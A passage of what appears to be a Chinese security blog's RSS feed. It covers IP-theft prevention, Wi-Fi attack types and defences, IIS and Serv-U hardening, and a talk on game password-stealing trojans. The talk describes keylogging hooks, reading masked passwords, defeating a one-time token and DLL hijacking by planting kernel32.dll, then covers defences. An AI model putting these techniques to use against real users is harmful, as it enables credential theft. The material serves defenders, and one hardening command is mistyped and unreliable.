我个人感觉使用防火墙与代理服务器相结合，更能较好地解决IP地址盗用问题：防火墙用来隔离内部网络和外部网络，用户访问外部网络通过代理服务器进行。使用这样的办法是将IP防盗放到应用层来解决，变IP管理为用户身份和口令的管理，因为用户对于网络的使用归根结底是要使用网络进入因特网。这样实现的好处是，盗用IP地址只能在子网内使用，失去盗用的意义;合法用户可以选择任意一台IP主机使用，通过代理服务器访问外部网络资源，而无权用户即使盗用IP，也没有身份和密码，不能使用外部网络。

使用防火墙和代理服务器的缺点也是明显的，由于使用代理服务器访问外部网络对用户不是透明的，增加了用户西作的麻烦;另外，对于大数量的用户群来说，用户管理也是一个问题。
Tags - 技巧 , 原理 , 基础 , 网管 ]]> http://www.lovecns.com/post/651/ GreyHawk <> Wed, 04 Jun 2008 06:38:04 +0000 http://www.lovecns.com/post/651/ phpwind管理权限泄露漏洞”，还有就是ie的flash播放插件也被挖出，其实这个漏洞早被发现，官方也更新了，这阵子网上居然放出了生成器，我们明白，这个漏洞要泛滥了。

这个洞影响的是 9.0.115 及之前版本的Adobe Flash Player，后来有人说124也有问题，结果幻影的maillist上证实是虚惊一场。

装了360安全卫士或者瑞星卡卡之类的会提醒你第三方程序有漏洞，负责任一点的Web站点也会把codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0"

这里的 version 修改到最新，这样访问者会自动更新Flash的版本。



官方地址：http://www.adobe.com/shockwave/download/flash/trigger/en/1/index.html

Tags - 杀毒 , 安全 , 网管 ]]> http://www.lovecns.com/post/631/ GreyHawk <> Sat, 03 May 2008 02:21:37 +0000 http://www.lovecns.com/post/631/
　　(一)攻击方式

　　1.Wireless Dosattacks

　　Dosattacks主要是通过洪水算法来阻塞网络，并导致网络合法用户无法使用该网络的服务。与有线网络相比，针对Wi-Fi网络的Dosattacks在网络的应用层和运输层的攻击没有什么特殊性，但由于无线通信介质的特殊属性使得Wi-Fi网络在数据链接层和物理层遭受的Dosattacks危害更为严重。常见的Wireless Dos attacks有以下几种方式。

　　(1)802.11b应用层攻击。攻击者通过向应用程序发送大量的合法请求来降低程序的服务效率，阻止其向其他合法用户提供服务。

　　(2)802.11b运输层攻击。在这一层，攻击者通过发送大量的链接请求来攻击主机的操作系统，降低其服务效率，常见的有SYN洪水攻击。

　　(3)802.11b网络层攻击。网络层的Dos攻击主要是针对效率较低的Wi-Fi网络，攻击者通过向网络发送大量的数据来攻击网络的脆弱结构，降低网络serverCPU的服务效率，常见的网络层Dos攻击是Pingflood攻击。但由于目前高速WLAN技术的成熟，这种攻击已经很少起作用了。

　　(4)802.11b数据链接层攻击。尽管WEP工作在该层，但鉴于WEP的脆弱性，甚至有些Wi-Fi网络不使用WEP，从而导致该层受到Dos攻击。另外不正确的使用DiversityAntennas也会使该层易受到Dos攻击。DiversityAntennas是一种用来避免多径潮水效应的设备，它可以为Stations选择最强的信号来源以避免多径潮水效应，但同时这也将造成Wi-Fi网络易受到Dos攻击。只要攻击者将攻击设备的MAC地址改成Station的MAC地址，然后选择的Antenna的信号足够强，就会导致Station从其所在的Antenna上掉线。

　　(5)802.11b物理层攻击。鉴于Wi-Fi网络传播介质的特殊性，像有线网络的介质那样予以人为的保护是不可能的。由于Wi-Fi标准采用的是ISM公开的2.4GHz的波段，一旦攻击者利用工作在该波段的噪声设备发动足够强的噪音信号进行冲击，Wi-Fi网络的物理层将无法进行工作。

　　2.Illicituse

　　这种攻击主要有以下两种方式。

　　(1)盗用计费。非法使用AP的外部链接进入到Internet，盗用Wi-Fi网络的外部计费。

　　(2)隐蔽犯罪。为了隐藏身份，攻击者通过非法接入Wi-Fi网络AP，转而进入Internet采取攻击行为，从而使直接的责任落到了被寄生的AP身上，造成了Wi-Fi网络的麻烦。Illicituse风险对于有线LAN来说几乎不存在，但却会极大地危害到WLAN网络。这种攻击行为虽然无法造成Wi-Fi网络的系统问题，但攻击者可以通过这种方式非法使用Wi-Fi网络的外部链接，盗用Wi-Fi网络的外部计费，甚至掩盖其非法行为。

(二)网络维护方法

　　Wi-Fi网络的物理组网结构可分为两种：基础服务组和扩展服务组。

　　(1)基础服务组：网络由客户端(Stations)和接入点(APs)两部分组成，适宜小数据量网络的组建。如果仅仅是短期内进行连接组网，只需要有安装了Wi-FiCard的Stations即可实现端到端的Wi-Fi通信。

　　(2)扩展服务组：稳定的、完整的Wi-Fi网络由Stations、APs以及有线网络三部分组成，这种结构被称之为扩展服务组,通常是由BSS扩展而成的。

　　根据Wi-Fi网络的结构特点，针对上述有关Wi-Fi网络本身的攻击方式，我们将从Stations安全、APs安全以及网络主干网安全三个方面对Wi-Fi网络可以采取的安全措施加以说明。

　　1.Stations安全

　　Stations安全涉及到整个Wi-Fi网络安全的核心。Stations中包含着大量的机密信息，如果攻击者攻破了Stations的安全措施，将给Wi-Fi网络带来巨大的损失。相关的安全措施主要有：(1)禁止Stations自己向外提供数据或者其他服务;(2)安装有效的杀毒软件，防止木马、蠕虫等病毒的侵入;(3)数据资源加密，评估自己的数据资源的重要级别，然后针对不同的安全等级对他们采取不同的加密措施和访问控制，这样既保证数据被合法用户采用，又可以保护数据不被恶意的攻击者窃取;(4)安装防火墙，防火墙可以是硬件也可以是软件，安装时应将防火墙放在网络入口处或需要保护的网段，保护网络的方式有，①数据包筛选：摒弃与规定不符的数据包。②代理服务：允许防火墙伪装成连接的终点，保护客户的IP地址。③状态检查：对比数据包的部分内容，对其进行筛选，比如IP地址、域名、协议、端口和内容等;(5)杜绝采取定期自动更新软件机制，这也是攻击者经常攻击的对象。

　　2.APs安全

　　接入点的安全设置是整个Wi-Fi网络安全的重要一环，通过encrytion、authention以及适当的monitoring措施，我们可以达到APs的安全目的。

　　(1)MAC地址列表，大多数AP具有地址列表功能，该功能有助于我们提高网络的安全性，主要形式有两种。

　　●开放式地址列表：允许除了被标明的MAC地址以外的任何MAC地址访问网络AP，不建议采用这种方式。

　　●封闭式地址列表：只允许被标明的MAC地址访问AP，这种方式较为安全。

　　(2)接入管理，通常情况下，大多数的AP都支持类似Telnet、HTTP以及串口和USB接口连接，但是其中Telnet方式应尽可能的屏蔽，因为这种方式会使数据处于完全暴露状态;如果AP支持，还应该限制有线接入部分;对于小型网络，尽量不用在线远程管理，这会带来不必要的风险。

　　(3)鉴权及访问控制，设置SSID号：SSID全称为ServiceSetID，它是Wi-Fi协议构建的一个32位的网络标识号，只有知道SSID号的人才可以进入Wi-Fi网络。

　　●访问控制列表：用于筛选数据包。

　　●鉴权：主要是通过WEP来实现的，但由于其不健壮性，所以市场上目前出现了许多其他技术来完成鉴权功能，例如portals、Ipsec以及802.1x等。

　　(4)SNMPMonitoring，SNMP是一种强大的管理网络链接设置的协议，其主要特点是可以被远程监测。SNMP采用的是管理员与代理的模式，管理员通过发送请求到代理来请求管理，代理随后回一个响应。通常SNMP有两种形式：read-only和read-write,他们均须提供字符串鉴权，如password。我们可以通过SNMP的MIB(managerinformationbase)来决定SNMP的管理类型。

　　通常，802.11协议的设备都具有自己的MIB，允许其像监视服务端一样监视MAC和PHY层。目前市场上常见的SNMPMonitoring工具有net-snmp等。

　　(5)采用保护天线，我们只需要利用保护天线使我们的数据电波向我们想要发射的地方发射，就可以有效地缩小攻击者的攻击范围，减小网络安全的风险。

　　3.主干网GateWay安全

　　防火墙设置主要是对第三层以上的网络体系结构进行保护，然而随着无线Wi-Fi技术的应用，网络一、二层成为攻击者攻击的新目标，所以Gateway将是攻击者面对的第一道屏障。

　　(1)GateWay可以是设置在LAN与Internet、LAN与WLAN的AP之间的具有一定保护作用的硬件设备和相应的软件。GateWay可以使我们的网络更加安全，它将起到以下几个主要作用：提供防火墙保护网络、为两个网络提供NAT、提供DNS服务。

　　(2)GateWay设置原则，应遵循将无线网的接入点AP以及主干网的外网连接与我们的主干网隔离的原则。不正当的GateWay设置会使我们的网络极易遭受攻击者的袭击。
二、Wi-Fi网络通信安全

　　(一)Wi-Fi网络通信安全的威胁

　　无线通信安全的主要威胁是Man-in-the-MiddleAttacks，常见的形式有两种：被动形式和主动形式。

　　●被动形式：攻击者通过搜集大量的Wi-Fi网络的通信数据进行分析、破解，以达到窃取机密的目的。

　　●主动形式：攻击者通过被动形式的冲击，分析出WLAN的传输协议及加密算法,并以相同的协议、算法修改甚至伪造WLAN的信息。

　　(二)Wi-Fi网络通信安全维护方式

　　Wi-Fi网络通信安全的维护方式不像其结构安全那样可以有软件也可以有硬件，鉴于其传输介质的特殊性，它只能是由软件来组成。我们常用的方式有以下几种：

　　1.WEP keys

　　虽然WEP的密钥已经被破解，但如果我们使用了WEP，仍会给攻击者造成一定的障碍，使之不得不花费几个小时时间去破解WEP，这足以使一些无聊的攻击者放弃自己的攻击行为。对于公司而言，使用WEP来保护公司的机密，一旦有攻击者试图破WEP，公司就可以认定其非法进入从而诉诸法律。

　　2.Ipsec VPN

　　IP安全协议是一组用来在IP层上支持数据包安全交换的协议。它支持两种加密方式：传输端口和隧道。

　　●传输端口：只对数据包部分加密，而报头部分未加密，安全性较隧道差。

　　

　　●隧道：与保密隧道(SSH)相似，我们将在下面讨论。

　　利用Ipsec来实现VPN以此来支持WLAN安全通信。比起WEP来，IpsecVPN将提供更为强大的机密性、完整性和可用性。

　　3.保密接口层(SSL)与保密隧道(SSH)

　　SSL(securesocketlayer)采用了一种公开的密钥加密。首先用户必须发送一个权利说明，包括用户名、密码等以表明自己的身份，这个说明经终端服务器识别，用户便可登陆。但是接下来出现了一个问题，就是服务站点发送给用户的信息中仍可能有机密信息，这样攻击者仍可以接收到站点发来的信息，从而使我们的信息失窃。

　　SSH(secureshell)仍像SSL一样采用公开的密钥，但由于它同时还结合了私有密钥的使用，从而解决了SSL的安全漏洞。SSH提供几种安全等级供用户选择，其安全性高于Telnet、R-commands等，同时SSH还提供端口到端口的隧道通信机制来保证特殊通信的安全。

　　4.静态ARP

　　ARP协议通信过程首先是用户向服务器发送自己的IP地址到网络上，一旦服务器收到请求便发送自己的MAC地址给用户，这样用户便可以与之进行通信。但是目前许多系统采取的是主机一旦收到一个数据包，便将包中的IP与MAC地址认为是匹配的，从而将其添加到自己的地址转换列表中，如果将来再与之通信，便使用该MAC地址进行请求即可，这种方式称为动态ARP。但这就给网络攻击者以可乘之机，他们将服务器的IP和自己的MAC传给用户，同时将用户的IP和自己的MAC传给服务器，从而在二者之间插入了一个中间站，进行窃取、修改甚至伪造信息等不法行为。而使用静态ARP则可以有效地避免这种网络威胁。

　　5.应用密码学的使用

　　应用密码学的兴起为我们实现WLAN通信安全提供了一个新的途径，用户可以在应用层利用加密算法软件(甚至可以编写自己算法软件)先对自己的数据进行加密，然后再通过发送设备发出去。这样在接收端的接收用户只需要利用相同的算法软件即可得到完整的信息,同时也提高了数据传输的安全性。
三、Wi-Fi网络安全策略

　　总的来说，好的安全策略并不是某一种或者几种方法和工具，而是要设置层层安全屏障，这样才能有效地阻止网络黑客的攻击。网络安全策略的具体运用总体上可以分为网络建立前的安全策略制订阶段和网络建立后的维护阶段两部分。

　　(一)安全策略制订

　　一个网络要想拥有一个好的安全策略，在网络建设的筹划阶段就应当将其考虑在内，而不是在网络建成后才予以考虑的。这样就会避免安全策略为了迁就已经成型的网络而存在一些漏洞。下面的安全策略制订原则是我们制定网络安全策略必须考虑的。

　　1.理论联系实际：分析理论上的和实际上可能发生的风险，这样将有助于杜绝尽可能多的攻击。

　　2.财力结合实际：结合网络的重要级别来采取具体的保护措施。比如你是一个SOHO用户，那么为了实现网络登陆鉴权，有SSID和WEP就足够了，但这两种方法对于大型Wi-Fi网络来说是绝对不行的，必须采取更专业的方法和工具。

　　3.针对性防护：如果你的网络安全核心是保护信息，就必须加强对数据的保护;如果是防止Illicituse，就必须加强登陆管理。

　　(二)安全策略维护

　　安全策略的制定不是一劳永逸的，它并不能保证我们的网络将是永久安全的。网络攻击者会不遗余力的开发出更新、更有杀伤力的攻击方法和工具，所以安全策略的定期检验和维护是必要的，这一过程将是长期、反复的。


Tags - 基础 , 技巧 , 安全 ]]> http://www.lovecns.com/post/610/ GreyHawk <> Fri, 21 Mar 2008 06:01:50 +0000 http://www.lovecns.com/post/610/ 张翼：大家好！首先讲讲网游木马常用攻击技术。第二，讲讲从开发商的角度，以较低的成本实现防御网游木马的策略。首先是键盘记录，所谓的键盘记录是在在键盘输入的时候木马会把你的键盘输入的信息记录下来，网上流传最广、最通俗的方法就是安装全局消息钩子，从而窃取密码。原来消息钩子这种进入密码的方法用得比较多，但是从2006年起主动防御的流行这类方法会被行为监控拦截，比如卡巴斯基这种主动防御就防这个。后来逐步地有一些黑客发掘出以前使用的比较少的被厂商所忽视的一种方法，例如图片上举到的这些（图）。

前面几个安装全局消息钩子、 GetKeyState、GetAsyncKeyState 、 DirtecX接口的方法是从用户态实现的。原始输出设备raw input用它来窃取密码，这也是属于用户态的。键盘过滤驱动以及挂钩键盘驱动的Dispatch例程等方法属于核心态实现的。 Ppt中后面提到的所谓的Inline Hook是广义的，就是我进行挂接的时候可以在Rin3上挂，也可以在Rin0下挂，我的hook可以挂在自己的游戏程序里面，从而获取密码，深入的话也可以深到话kbclass设备的回调函数。突破nPtotect保护也不难。

第二部分是内存读取。用户输入密码后，通常情况下密码没有经过处理的话，有一段时间用户输入的密码会以明文的形式存放在内存中，包括登录游戏后，游戏中人物装备等级等信息都可以从游戏进程的内存中读取。

第三是星号密码获取以及缓存密码，比如在QQ或 MSN上输入密码的时候，可以选择记录密码的情况。使用GetWindowText函数就可以获取常规的星号密码，当然对于具有密码属性的输入框在GetWindowText之前需要使用 SendMessage取消其密码属性。

下面讲到浏览器插件，主要用于获取IE相关的信息，也可以用来突破HTPS。

来看张图片，小区域精确截图（图），这种方法可以应对许多种网游的保护措施，先安装一个全局鼠标钩子，对你鼠标点击的时候，比如鼠标点击这边，事先算一下你的按纽的像素，把边长除以二，以鼠标点击的点为正方形的中心，从而以这个点截取一个正方形，面积最大的就是我们所要的密码信息。小区域精确截图的方法和图象识别，从而可以把图象信息直接转化为字符。如果说比较复杂，图象识别不了的话，黑客们常使用的方法就是发邮件，因为发邮件是可以以HTML的方式，从而可以把图片嵌在里面，黑客收到信的时候，看密码就一目了然。虽然是截取的图，但是也能很清楚地看到。

除了刚才讲的这些，下面还有应用得比较广的，例如封包截取或者协议分析，从协议的角度分析人物信息、用户名、密码。现在还是有一些比较厉害的人可以通过调试，逆向工程，结合ARP欺骗，对于非对称密钥加密的话，传统的破解方法比较困难。但是在局域网里面可以结合ARP欺骗、伪造，实现相应的效果。基本上现在的木马在对付非对称密钥加密的时候基本上是采用欺骗的方法。

还有一些其他技术，比如一些猥琐方法，谈技术含量比较低，但还是有效果。举一个例子，很久之前人家想到QQ密码，他自己写一个界面和QQ基本上差不多的，然后输入之后，再把真正的QQ进程运营起来。这是被人鄙视的方法，要钻空子的话还是比较多的。几年前盛大对安全很重视，那时候推出的盛大密宝，但它那种对于真正想窃取的人也是形同虚设，但是那个可能比较困难，或者还需要入侵它的服务器，把相应的算法搞清楚。这是比较困难的，但是用得比较多的，现在很容易实现的就比如这张图（图），我们后面讲的解决方案也会碰到类似的问题，对于盛大密宝使用的这些方法，我先简单地把盛大密宝的使用过程讲一下。

在输入用户名、密码后，它会又出现一个对话框，盛大密宝是以1分钟为间隔。以一分钟为单位，有一个函数，那个函数有两个变量，盛大密宝的序列号做了变量，还有一个变量就是和时间相关的。以一分钟为单位，会随机生成六位数，但是登录之后游戏里面就会随机抽取三位，请你输入盛大密宝，所谓盛大密宝就像U盘大小，中间有一个写字屏，以一分钟为单位，按照它的算法随机生成六位数，游戏的程序比如说请输入第一位、第三位、第四位，从六位数里面选三位数，让你输入第几，这是游戏随机的。以我们常人的角度看来就很安全，安全性很高。但是还是能被破解，原理就是这样（图）。

比如这里有两台机器，这台机器上面已经感染了能够破解密宝的高级木马，攻击者已获取初次登录及的用户名、密码。攻击者用已获得受害者的用户名密码登录。当受害者登录游戏时输入的用户名和密码已被木马程序换掉，登录另外一个无关帐户。为什么木马要在受害者登录时把他的帐号密码换成其他帐号呢，因为一个帐号不能同时登录。这样受害者输入自己的用户名、密码的时候其实已经变成另外一个人的帐号了。他进去之后会出现一个框，要求输入盛大密宝随机生成的6位数中的3位数。而且3位数的序号是给定的，比如第一位、第三位、第四位的六位数。从六位里面选三位位置是随机的。攻击者登录后出现密宝信息输入框，比如说请输入六位数里面的第四位、五位、六位。如图，攻击者只需在木马控制端里输入四、五、六，点完发送。此时木马端收到信息后就会把受害者的第一位、第三位、第四位提示信息换成四、五、六位。这样受害者就会输入盛大密宝随机生成的6位数第4、5、6位数字，这正是攻击者登录游戏所需要的信息。所以攻击者就实现了破解盛大密宝保护的效果。

因为黑客进入游戏之后防止他再重新进入，发现帐号正在使用，可以在我们的木马端做一些手脚，拦截封包两三分钟内让他上不了网，等他看看是否有一些有价值的装备或者游戏币，等处理完之后再让他上线。或者暴力一点，就是直接终止进程。也可以挂钩NtCreateProcess/Ex、NtCreateSetion，在一定时间内禁止次进程创建。

从内存读取的方法在木马里面也是使用得非常广泛的。在QQ稍微老一点的版本也是同样存在内存里面。现在有一些网上银行及游戏，他可能采用软键盘，我刚才说的对付软件盘通常有两种，一种是截图的方法，还有就是挂钩TextOut函数，取得软件中的字符，类似于金山词霸的技术，也就是是屏幕取词，用户点击点密码时已经被屏幕取词获得密码的字符信息。我这里讲的是一些主流的，还有针对特定的情况有一些比较猥琐的方法。

刚才是从攻击的角度进行分析的。现在开始讲怎样防御。考虑防御站的角度不同，比如游戏开发商是从自己写游戏的角度。从第三方安全软件开发商，比如瑞星、卡巴斯基，或者从使用者、网络管理员，比如网络管理员怎么样从边界防火墙角度怎样进行相应的配置。现在我讲的主要侧重于游戏开发者的角度。从游戏开发商的角度和第三方安装软件的防御角度还是有区别的。因为如果是游戏开发商的话，他做防御是要小型化，主要针对我自身的特性。不像安全软件可以做的很全面很庞大。从游戏开发商的角度是怎样做最少的事情取得自身游戏的安全性。

我们先从基于主机的角度谈一谈。我们刚才已经粗略地了解了网游木马的密码获取常用手段，对应地我们要将缓存密码加密，自定义窗口类对相应读取密码内容的窗口消息进行处理，从而使它用传统的方法获取不到密码。第二是防范按键记录，虽然这只是简简单单几个字，我是把涉及到的面讲一讲，同样是一个防范按键进入，可以做得很浅，但同样也可以做得很深。越深入底层公开的资料越少，操作的系统提供的现成接口比较少，需要自己做的比较多，所以难度系数增大，从而会写的人就比较少，安全性就提高了。但是随着防御越往底层做，虽然安全性提高了，但是稳定性也下降了。从理论上说，只要原理正确的，也是可以做到稳定的。但是因为这些东西是人开发的，由于水平、经验，尤其是开发时间的限制，没有那么多时间去测试，没有时间经过多种客户环境的考验，所以想推出一个非常底层的产品级的、比较稳定的，时间会比较漫长。现在防范键盘记录的一个比较底层的比较稳定的方法是挂kbclass中的KeyboardClassServiceCallback，兼容性也较好，兼容USB、 PS/2的。

原来QQ采用的是虚拟键盘，虚拟键盘其实也是一种成本较低效果较好的方法。但需要防御我刚才说那些密码窃取方法，比如挂钩TextOut的屏幕取词以及小区域精确截图。另外就是软键盘中按键的顺序要随机生成，还有就是软键盘在屏幕上出现的位置最好也要随机，如果大键盘位置固定的话还是很容易被盗取。还有就是最好不用字符，用比较复杂具有较强干扰性的图片，这样图象解析就比较困难，一般只能用截屏。我们现在已经知道的屏幕截取的方法通常是CreateDC和模拟鼠标按键PrintScreen键，所以只要挂钩相关函数就可以防止截取。从产品可用性的角度，在输入密码的一分钟之内对截屏功能禁用，这样对可用性也没有什么影响，而且避免了因交互式保护的烦琐带来的用户体验下降的弊端。

还有一种是在网吧里比较盛行的基于ARP欺骗窃取整个局域网内的游戏帐号信息。现在网吧基本上都是交换机的，基本上都是通过ARP欺骗的方法，就可以破取局域网里面其它机器的分包，如果能把网游的协议逆向分析出的话，就可以破解获取整个局域网里所有使用游戏用户的信息。对于网吧和局域网用户，防范ARP欺骗是很有必要的。

网游木马使用的各种密码窃取技术都会使用到相关的函数，从基于主机主动防御的角度，对相关函数挂钩实施行为监控即可防御相应密码防御技术，如 NtOpenProcess、NtReadVirtualMemory、NtUserSetWindowsHookEx、CreateDC等。其中挂钩NtOpenProcess/NtReadVirtualMemory用来防范木马程序读取游戏程序进程空间中的密码， NtUserSetWindowsHookEx用来防范安装全局钩子。另外还可以枚举设备栈，对键盘过滤驱动进行检查。通常安全软件中使用较多的是编写驱动程序挂钩SSDT，还有少部分inline hook。去年出现的比较多的安全软件的驱动漏洞不少是因为SSDT挂钩后的处理函数编写不完善，所以实现行为监控功能时我们自己的处理函数也要写得很健壮，防止漏洞的产生。

对于防御ARP欺骗，通常采取NDIS HOOK或者NDIS IMD技术，截取ARP包进行分析，丢弃伪造的欺骗包。另外实现还应建立一个可信的IP-MAC库，所谓的可信基就是在确保网络没有欺骗的情况下，确保其他机器尤其是网关的IP-MAC映射关系，先把它存起来，然后截取到ARP封包时与事先建立的可信IP-MAC关系进行比较判断。还有一个是比较简单的，就是用系统自带arp命令实现IP/MAC绑定的，但是对于Windows2000应该是没有用的，这点网上几乎没有披露，印象中只有flashsky以前提及过。因为Windows2000没有检查IP-MAC绑定是静态的还是动态的，虽然进行了绑定，但只要有ARP请求/应答包，WIindows系统还是会把伪造的IP-MAC对应关系添加到自身的ARP缓存表中。ARP的绑定功能在Windows2000里面形同虚设。所以通用有效的还是使用驱动利用NDIS HOOK/NDIS IMD技术拦截ARP包分析过滤。

有些情况下要获取游戏密码以及人物信息的话，最好到它的进程空间里面去，所以有很多木马就把自己的dll先注入到你的游戏进程里面。但是现在许多安全软件比如卡巴7、江民2008都采用的主动防御技术，而已防范常规的诸如CreateRemoteThread、SetThreadContext等注入技术。为了绕过主动防御以及实现自启动，某些木马利用了Windows一个简单的系统机制，就是目录的优先级，具体讲如果当没有写绝对路径只是相对路径，调用dll时，优先加载同目录下的，然后才是系统目录。比如在网游目录下释放一个kernel32.dll， kernel32.dll所有Ring3程序都需要用到的吧，所以只要你的游戏程序隐形起来了，木马释放的kernel32.dll也就注入到了游戏进程里面。所以防止其他程序在游戏目录中创建相关文件也是比较重要的。关于具体的实现技术可以采用文件过滤驱动，甚至是Ring3下的全局钩子。另外，Ppt中提到的辅助方案：“游戏主进程检查自身模块中除了自身dll模块以及已签名文件有没其他dll模块，有则强行卸载”，与刚才说的互补的，还是比较有效的。

还有就是保护自身程序不被修改，因为当安全软件越来越严格，可能盗号木马无路可走时就以修改你自身的程序实现密码窃取以及自启动，所以对游戏自身的保护也很重要。

刚才说的主动防御行为监控的方法可以在不需要特征码的情况下实现通用的防护，但是和传统的特征码的方法相结合的话，往往可以取得更好的效果。而且自动更新也很重要，万一出现一个从来没有出现过的比较强的破解方法的话，应急小组知道这个情况，可以立马对程序进行更新。所以Office文件格式的漏洞为什么比PDF漏洞利用效果好，指的是非0day，因为 PDF会强行自动更新，Office的是手动更新的（正版用户Office2003以及以后也会自动更新了）。

我们刚才是从游戏开发商的角度讲，所以他不可能就像卡巴斯基从安全软件的角度那样实施纵深立体防御，面面俱到。无论你怎么防，虽然说能够很大程度地防御，但是还是有漏过的地方。安全防护和黑客技术没有谁最厉害，你这个安全方案出现的话他完全可以钻你的空子，尤其做产品不是纯粹从技术角度出发，往往因为从程序的稳定性以及使用友好型的角度都会牺牲一些安全强度。所以很难做到百分之百的安全，所以我们不妨换一角度，找一个可信基。比如现在因为手机的普及，可以将帐号与手机关联，登录以及修改密码时需要绑定的手机回复短信确认。有些游戏现在与MAC地址绑定，我认为绑定的话最好绑定PC以外的，因为木马程序已在机器当中，运用广义Hook的这一强大思想机型伪造，都能搞定。所以我们从另外一个角度，不应绑定pc上的，脱离它，比如和手机绑定，如果修改密码的话，它就会收到一条短消息，如果确认修改密码请回复Y等类似途径。对于虚拟物品的操作发短信通知用户并询问。当然对于虚拟物品操作可以尝试采用T+1方式，预先登记然后审核确认。

再就是动态口令卡，就像工商银行的网上银行。还有移动证书/Usbkey等。相对而言比较安全。但对于动态口令卡以及类似盛大密宝的保护措施，需要防御我刚才介绍的破解盛大密宝的那种思路。可以和基于主机的防御方法相结合。另外动态口令卡算法健壮性和验证服务器安全性也很重要。


Tags - 原理 ]]> http://www.lovecns.com/post/547/ GreyHawk <> Mon, 24 Dec 2007 10:44:42 +0000 http://www.lovecns.com/post/547/
　　这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例，跟大家共同探讨虚拟主机配置问题。

　　一、建立Windows用户

　　为每个网站单独设置windows用户帐号cert，删除帐号的User组，将cert加入Guest用户组。将用户不能更改密码，密码永不过期两个选项选上。

　　二、设置文件夹权限

　　1、设置非站点相关目录权限

　　Windows安装好后，很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改 的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。

C：\; D：\; ……
　　C:\perl
　　C:\temp\
　　C:\Mysql\
　　c:\php\
　　C:\autorun.inf
　　C:\Documents and setting\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动
　　C:\Documents and Settings\All Users\Documents\
　　C:\Documents and Settings\All Users\Application Data\Symantec\
　　C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
　　C:\WINNT\system32\config\
　　C:\winnt\system32\inetsrv\data\
　　C:\WINDOWS\system32\inetsrv\data\
　　C:\Program Files\
　　C:\Program Files\Serv-U\
　　c:\Program Files\KV2004\
　　c:\Program Files\Rising\RAV
　　C:\Program Files\RealServer\
　　C:\Program Files\Microsoft SQL server\
　　C:\Program Files\Java Web Start\


　　以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系，这里仅简单提及。

　　2、设置站点相关目录权限：

　　A、设置站点根目录权限：将刚刚建立的用户cert给对应站点文件夹，假设为D：\cert设置相应的权限：Adiministrators组为完全控制; cert有读取及运行、列出文件夹目录、读取，取消其它所有权限。

　　B、设置可更新文件权限：经过第1步站点根目录文件夹权限的设置后，Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时，可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定，站点根目录中uploads为web可上传文件夹，data或者 database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。当然也可以像有些做的比较好的虚拟主机提供商一样，给客户做一个程序，让客户自己设定。可能要做到这样，服务商又得花不小的钱财和人力哦。

　　基本的配置应该大家都会，这里就提几个特殊之处或需要注意的地方。

　　1、主目录权限设置：这里可以设置读取就行了。写入、目录浏览等都可以不要，最关键的就是目录浏览了。除非特殊情况，否则应该关闭，不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。

　　2、应用程序配置：在站点属性中，主目录这一项中还有一个配置选项，点击进入。在应用程序映射选项中可以看到，默认有许多应用程序映射。将需要的保留，不需要的全部都删除。在入侵过程中，很多程序可能限制了asp，php等文件上传，但并不对cer，asa等文件进行限制，如果未将对应的应用程序映射删除，则可以将asp的后缀名改为cer或者asa后进行上传，木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射，可执行文件可以任意选择，后缀名为.mdb。这是为了防止后缀名为mdb的用户数据库被下载。

　　3、目录安全性设置：在站点属性中选择目录安全性，点击匿名访问和验证控制，选择允许匿名访问，点击编辑。如下图所示。删除默认用户，浏览选择对应于前面为cert网站设定的用户，并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览，可以有效阻止这类的跨目录跨站入侵。

　　4、可写目录执行权限设置：关闭所有可写目录的执行权限。由于程序方面的漏洞，目前非常流行上传一些网页木马，绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传，如果关闭了可写目录的执行权限，那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。

　　5、处理运行错误：这里有两种方法，一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息，选择发送文本错误信息给客户。二是定制错误页面。在IIS属性――自定义错误信息，在http错误信息中双击需要定制的错误页面，将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种，可以根据情况自行定制。这样一方面可以隐藏一些错误信息，另外一方面也可以使错误显示更加友好。

　　四、配置FTP

　　Ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。

　　1、管理员密码必须更改

　　如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码，这些工具使用起来就再好用不过了。如果更改了密码，那这些工具要想正常运行，那就没那么简单喽。得先破解管理员密码才行。

　　2、更改安装目录权限

　　Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中，则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限，那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后，得修改相应的文件夹权限，可以取消Guests用户的相应权限。

五、命令行相关操作处理

　　1、禁止guests用户执行com.exe：

　　我们可以通过以下命令取消guests执行com.exe的权限

　　cacls C:\WINNT\system3\Cmd.exe /e /d guests。

　　2、禁用Wscript.Shell组件：

